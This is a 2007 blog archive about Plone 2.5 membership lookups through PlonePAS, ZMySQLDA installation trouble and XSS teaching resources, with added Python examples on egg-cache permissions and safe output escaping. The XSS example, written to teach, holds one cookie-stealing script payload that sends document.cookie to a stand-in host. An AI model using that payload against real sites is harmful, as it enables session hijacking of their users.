Archive for June, 2007

Plone PAS NOT hooked up to portal_membership?

I have been trying to convert my course website code to work with the new Plone 2.5.2 install. Typically, new features aren't documented clearly or at all. The biggest hangup is the PlonePAS setup, which has changed the way membership data is accessed. No longer do portal_membership calls work, or at least not completely. For example, context.portal_membership.listMemberIds() works, but only for the users defined in the default member plugin. I use SQLPASPlugin, and the above code does not list members defined in an SQL database.

The only way I've been able to get access to them programmatically is to use context.acl_users.X, which I am not sure is the right way. Some test code below:

# Test code for new PAS Plugin architecture---NOT hooked into portal_membership
# (Zope Python Script, Python 2, run through the ZMI)
# portal_membership only sees the default member plugin, so users that come
# from SQLPASPlugin are missing from these four calls:
print "Current User: ", context.portal_membership.getAuthenticatedMember()
print "Users: ", context.portal_membership.listMemberIds()
print "Search Users: ", context.portal_membership.searchForMembers(name='staff1')[0].getRoles()
print "Search Roles: ", context.portal_membership.searchForMembers(roles='cscishstaff')
# Going to acl_users directly does return the SQL-defined users as well:
print "acl_users: "
users = context.acl_users.searchUsers(roles='staff')
for u in users:
    # each hit is a dict; print the user id and title, then the whole record
    print "%s(%s)" % (u['userid'], u['title'])
    print u
return printed


Saga of ZMySQLDA on Plone 2.5.x continues

I had hoped that I was done with installing ZMySQLDA on Plone, but it turns out there were some additional hiccups. ZMySQLDA was being recognized as a product in the Control Panel, but it disappeared from the drop-down menu again. Looking at the event.log revealed that it was trying to extract files from an egg file into my personal user home directory, not that of the "plone" user that was created and under which the Plone process was being run. Not exactly sure why this is happening, but I took the lazy way out and manually copied and pasted the MySQLdb folder and _mysql.so file into the Python directory. An added complication was that the _mysql.so also had to be copied into the ZMySQLDA directory.

I really need to sit down and figure out all this egg and process configuration, but am running out of time setting up for my summer courses.
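For what it is worth, the egg extraction described above is driven by pkg_resources: zipped eggs are unpacked into the directory named by the PYTHON_EGG_CACHE environment variable, which defaults to ~/.python-eggs under whatever $HOME the process inherited. If the Zope process is started from another account's environment, the eggs land in that account's home, and a cache that other accounts can write to is a place where they can plant code the Zope process will later import. The helpers below are an added example (not code from the original post or from ZMySQLDA/Plone) that give the service account a private cache and verify it; the demo path is a temporary directory, and function names are hypothetical.

```python
"""Added example: a private setuptools egg cache for a service account.

pkg_resources honours PYTHON_EGG_CACHE (default ~/.python-eggs).  These
helpers create a cache directory that only the current uid can use and
check that nobody else could drop an egg into it.  Names and paths here
are hypothetical; nothing below comes from Plone or ZMySQLDA.
"""
import os
import stat
import tempfile


def ensure_private_egg_cache(path):
    """Creates the cache directory with mode 0700 and points
    PYTHON_EGG_CACHE at it.  Returns the configured path."""
    os.makedirs(path, mode=0o700, exist_ok=True)
    os.chmod(path, 0o700)          # makedirs' mode is subject to the umask
    os.environ["PYTHON_EGG_CACHE"] = path
    return path


def egg_cache_is_private(path):
    """True only if the cache exists, is a directory, is owned by the
    current uid and grants no permissions to group or others.  A missing
    or foreign-owned directory is what the post ran into (eggs unpacked
    into another user's home); a group/world-writable one is a code
    injection point, since whatever lands there gets imported."""
    try:
        st = os.stat(path)
    except OSError:
        return False
    if not stat.S_ISDIR(st.st_mode):
        return False
    if st.st_uid != os.getuid():
        return False
    return stat.S_IMODE(st.st_mode) & 0o077 == 0


def demo():
    """Runs the check against a fresh temporary directory and returns the
    verdict before and after the directory is loosened to group-writable."""
    cache = ensure_private_egg_cache(os.path.join(tempfile.mkdtemp(), "eggs"))
    before = egg_cache_is_private(cache)
    os.chmod(cache, 0o775)         # group-writable: no longer private
    after = egg_cache_is_private(cache)
    return before, after


if __name__ == "__main__":
    # A real deployment would use a fixed path owned by the service user,
    # e.g. (hypothetically) /var/lib/plone/.python-eggs, exported in the
    # script that starts the ZEO clients.
    print(demo())   # (True, False)
```

In a deployment the export has to happen in the environment of the process that actually imports the eggs (the ZEO client start script), not in the shell of whoever happens to run it, which is exactly the mismatch the event.log showed.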


XSS Cross Site Scripting Resources

I have been ignoring going into details of web security in my introductory web class, partly because we cover so much (HTML, CSS, JavaScript, SQL, Python) that we really don't have time for it, and partly because I've been too busy to come up with some slides for it.

With the prevalence of XSS (Cross Site Scripting) hacks, it looks like this year I will be spending at least a few slides on security.

Some resources:

An informative post on Slashdot outlined a few points to consider when designing a site to be robust against XSS (I've highlighted his points, but the words are mostly his):

by Fireflymantis (670938) on Friday June 15, @04:21AM (#19516455)

• Are you making sure, without fail, that if a user changes view.php?id=32 to view.php?id=33 they are not getting access to content they shouldn't be?
• What about cookies? Assuming the malicious user can (and will) build cookies of their choosing and content, are you making sure that this cannot somehow be used to hijack another user's account?
• Are you 100% certain that every time you read get/post/put data it has been marked as tainted, validated, and only after it has made it through some very harsh sanity checks is it allowed anywhere /close/ to a DB insert/query?
• It gets even more muddled in the world of XMLHttpRequests, when you have to validate against a plethora of other constraints.
• Simply checking form data is almost 99% of the time not enough. For a non-trivial web app, even the above is not easy to do unless you pay attention to it every step of development. And even if you do that, you will probably miss something.
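Three of those points (output encoding against XSS, keeping request data out of the SQL text, and the id=32 to id=33 access check) worked through in plain Python, as an added example that is not from the original post or from the Slashdot commenter. The table, the two sample rows and the function names are constructed for the example; the database is an in-memory sqlite3 so it runs offline.

```python
"""Added example (not from the original post or the quoted comment).

Shows, with an in-memory sqlite3 database, three of the points above:
  * output encoding so user-supplied text cannot inject script (XSS),
  * parameterised queries so request data never reaches the SQL text,
  * an ownership check so changing ?id=32 to ?id=33 does not expose
    another user's record.
Table, rows and function names are hypothetical.
"""
import html
import sqlite3


# --- Output encoding ---------------------------------------------------------

def render_comment_vulnerable(text):
    """Interpolates user text straight into HTML: any <script> survives."""
    return '<p class="comment">%s</p>' % text


def render_comment_safe(text):
    """Escapes &, <, >, " and ' before the text reaches markup, so a
    payload is displayed as text instead of executed."""
    return '<p class="comment">%s</p>' % html.escape(text, quote=True)


# --- Data access: validated id, bound parameters, ownership in the query -----

def build_db():
    """Constructed sample data: two users, each owning one document."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE documents (id INTEGER PRIMARY KEY, owner TEXT, body TEXT)"
    )
    conn.executemany(
        "INSERT INTO documents (id, owner, body) VALUES (?, ?, ?)",
        [(32, "alice", "alice's notes"), (33, "bob", "bob's notes")],
    )
    return conn


def parse_doc_id(raw):
    """The 'harsh sanity check' on the request parameter: digits only and
    a bounded length.  Returns an int, or None for a bad request."""
    if not isinstance(raw, str) or not raw.isdigit() or len(raw) > 9:
        return None
    return int(raw)


def fetch_document(conn, current_user, raw_id):
    """Returns the document body only if the caller owns it.
    The id is validated first, then bound as a query parameter (never
    concatenated into the SQL), and the WHERE clause enforces ownership
    rather than trusting that the client only asks for its own ids."""
    doc_id = parse_doc_id(raw_id)
    if doc_id is None:
        return None
    row = conn.execute(
        "SELECT body FROM documents WHERE id = ? AND owner = ?",
        (doc_id, current_user),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    payload = "<script>new Image().src='http://evil.example/?c='+document.cookie</script>"
    print(render_comment_vulnerable(payload))   # script tag intact
    print(render_comment_safe(payload))         # &lt;script&gt;...
    db = build_db()
    print(fetch_document(db, "alice", "32"))          # alice's notes
    print(fetch_document(db, "alice", "33"))          # None: bob's document
    print(fetch_document(db, "alice", "33 OR 1=1"))   # None: fails validation
```

The escaping covers the case where user text lands inside an element body or a quoted attribute; text placed inside a script block or a URL needs the encoding for that context instead, which is the "plethora of other constraints" the comment alludes to.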


ZMySQLDA on Plone 2.5

I’ve just spent the last 2 hours or so installing ZMySQLDA on a Plone 2.5.3 site. It was considerably more painful than I thought, as I never used to have troubles with this product before.

The problem? PIL is required to be installed for Plone, and its ImageFile package conflicts with a similarly named package that is part of Zope (App.ImageFile).

This is fixed in the DA.py file of ZMySQLDA by explicitly importing the App.ImageFile package, not the PIL version.

After having the ZMySQLDA product finally appear in the Control Panel, it still wasn't showing up on the drop-down "add" menu. I am not sure what I did to fix this, but for a while only a single ZEO client had the menu option visible. Although I had rebooted/restarted the ZEO client/server multiple times and multiple ways (through the control panel and using the restartcluster.sh script), I think I still had the problem.

In any case, it now works and I have both ZEO clients showing "Add Z MySQL Database Connection."

I had planned on getting SQLPASPlugin set up, but it is already 12:27, and I need to go to bed.
